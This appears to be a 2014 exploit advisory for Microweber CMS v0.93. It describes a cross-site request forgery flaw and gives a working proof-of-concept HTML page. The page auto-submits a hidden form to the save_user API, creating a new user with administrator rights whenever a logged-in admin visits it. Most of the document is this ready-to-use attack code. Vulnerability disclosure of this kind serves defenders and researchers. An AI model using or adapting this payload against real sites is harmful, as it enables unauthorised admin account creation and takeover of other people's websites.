Microweber CMS v0.93 CSRF Vulnerability

2014.04.14
Credit: sajith
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

########################################################### [~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability [~] Author: sajith [~] version: Microweber CMS v0.93 [~]Vendor Homepage: http://microweber.com/ [~] vulnerable app link:http://microweber.com/download ########################################################### [*] Application is vulnerable to CSRF.below is the POC where attacker can use this vulnerability to create new user and assign Admin role to the user <head> <title>POC by sajith shetty</title> </head> <body> <form action=" http://127.0.0.1/cms/microweber-0.9343/microweber-master/api/save_user" id="formid" method="post"> <input type="hidden" name="id" value="0" /> <input type="hidden" name="thumbnail" value="" /> <input type="hidden" name="username" value="test1" /> <input type="hidden" name="password" value="mypassword" /> <input type="hidden" name="email" value="test@testing.com" /> <input type="hidden" name="first_name" value="abc" /> <input type="hidden" name="last_name" value="xyz" /> <input type="hidden" name="is_active" value="y" /> <input type="hidden" name="is_admin" value="y" /> <input type="hidden" name="basic_mode" value="n" /> <input type="hidden" name="api_key" value="1234" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html>

References:

http://microweber.com/download


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top